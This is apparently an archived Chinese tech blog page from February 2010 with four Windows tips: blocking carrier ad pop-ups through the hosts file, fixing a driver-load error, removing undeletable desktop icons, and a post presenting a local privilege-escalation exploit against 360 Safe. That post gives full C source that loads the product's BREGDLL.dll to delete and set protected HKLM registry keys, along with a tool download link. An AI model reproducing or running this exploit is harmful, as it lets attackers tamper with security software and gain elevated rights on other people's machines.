Browsed by
月度归档: 2010年2月

2月11日屏蔽联通广告禁止弹出联通资讯平台

2月11日屏蔽联通广告禁止弹出联通资讯平台

用这个方法可以屏蔽禁止弹出联通广告也就是最近新出的那个联通资讯平台

新建立一个文本文档,然后输入如下内容:

attrib -s -r C:\WINDOWS\system32\drivers\etc\hosts
call notepad.exe C:\WINDOWS\system32\drivers\etc\hosts
attrib +r +s C:\WINDOWS\system32\drivers\etc\hosts
exit

然后将该文件改名为:a.bat

运行创建的a.bat文件,在弹出的记事本编辑器中,在最下边新建一行内容输入:

0.0.0.0   www.10010cn.com
0.0.0.0   60.18.147.133
0.0.0.0   60.18.147.134
0.0.0.0   60.18.147.135
0.0.0.0   60.18.147.136
0.0.0.0   60.18.147.137
0.0.0.0   60.18.147.138

保存退出。

数字IP的具体哪个是联通的也不太清楚,但是多加几个上去,最近联通越来越烦人了。

Windows2003下列引导或系统启动驱动程序无法加载:packet

Windows2003下列引导或系统启动驱动程序无法加载:packet

优化了下系统,重启出现了一个错误。
弹出应用程序: 服务控制管理器 : 在系统启动时至少有一个服务或驱动程序产生错误。详细信息,请使用事件查看器查看事件日志。
仔细查看了一下windows日志记录错误原因是windows启动的时候提示一项服务或者驱动出错,在windows的安全日志中找到了如下的描述:

下列引导或系统启动驱动程序无法加载:packet

附上解决办法:

本地连接-〉属性,在网络协议中找到DDK PACKET Protocol,选中卸载了,重启电脑即可。

360本地提权漏洞演示+利用工具 EXP

360本地提权漏洞演示+利用工具 EXP

漏洞演示地址已失效

工具下载地址:

下载地址

代码:

[cc]
#include
typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_Delete_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

BREG_Delete_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;

#define AppPath “Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe”

#define TestDeleteKey HKEY_LOCAL_MACHINE
#define TestDeleteRegPath “Software\\360Safe\\Update”

#define TestSetKey HKEY_LOCAL_MACHINE
#define TestSetPath “Software\\360Safe”

BOOL InitBRegDll()
{
LONG lResult;
HKEY hKey;

CHAR cPath[MAX_PATH + 32] = { 0 };
DWORD dwPathLen = MAX_PATH;

lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
if (FAILED(lResult))
return FALSE;

DWORD dwType = REG_SZ;
lResult = RegQueryValueExA(hKey, “Path”, NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
RegCloseKey(hKey);
if (FAILED(lResult))
return FALSE;

strcat(cPath, “\\deepscan\\BREGDLL.dll”);

HMODULE modBReg = LoadLibraryA(cPath);
if (!modBReg)
return FALSE;

INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, “InitRegEngine”);
BRegDeleteKey = (BREG_Delete_KEY)GetProcAddress(modBReg, “BRegDeleteKey”);
BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, “BRegOpenKey”);
BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, “BRegCloseKey”);
BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, “BRegSetValueEx”);

if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
FreeLibrary(modBReg);
return FALSE;
}

if (!InitRegEngine()) {
FreeLibrary(modBReg);
return FALSE;
}

return TRUE;
}

LONG TestSetRegKey()
{
HKEY hKey;
LONG lResult;

lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
if (FAILED(lResult))
return lResult;

DWORD dwType = REG_SZ;
static char szData[] = “TEST VALUE”;
lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
BRegCloseKey(hKey);

return lResult;
}

int main(int argc, char *argv[])
{
if (!InitBRegDll()) {
MessageBoxA(NULL, “初始化BReg失败!”, “失败”, MB_ICONSTOP);
return 1;

}
if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
MessageBoxA(NULL, “键值删除失败!”, “失败”, MB_ICONSTOP);
return 2;

}

if (FAILED(TestSetRegKey())) {
MessageBoxA(NULL, “设置键值失败!”, “失败”, MB_ICONSTOP);
return 3;
}

MessageBoxA(NULL, “突破系统安全检查,获得最高权限,漏洞利用成功!”, “成功”, MB_OK);
return 0;
}
[/cc]

桌面IE图标或者我的电脑无法删除解决办法

桌面IE图标或者我的电脑无法删除解决办法

最近很多推广软件喜欢修改桌面假冒IE图标或者桌面IE图标,而且还无法删除,其实不是中毒,而是他们通过小伎俩,推广了广告,解决办法,进入注册表(开始菜单 运行 输入 regedit 回车)

然后依次展开:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Explorer\Desktop\NameSpace

到这会有一些东西,除了垃圾桶别删除外,其他都删除掉(小编喜欢桌面干净),图标自然消失了

如果是Vista系统

“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace”
下面 应该有
分别是{0……}{1……} {2……} {4……} {5……} {6……} {8……}{9……}{b……} {e……} {f……} 除了这几项之外的全删掉,再刷新

附录:为了干净起见,请多做以下动作

1,到 C:\WINDOWS\system32 删除最近建立的文件;

2,如果 我的桌面 也不能用了,请删除它,然后用记事本建立一个文件,内容是:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

然后把这个文件保存为:“Show Desktop.scf”,必须确认文件名和双引号中的一样。然后把保持的Show Desktop.scf文件复制到:“C:\Documents and Settings\用户名\Application Data\ Microsoft\Internet Explorer\Quick Launch”目录下。

方法二:清理桌面图标功能也可以搞定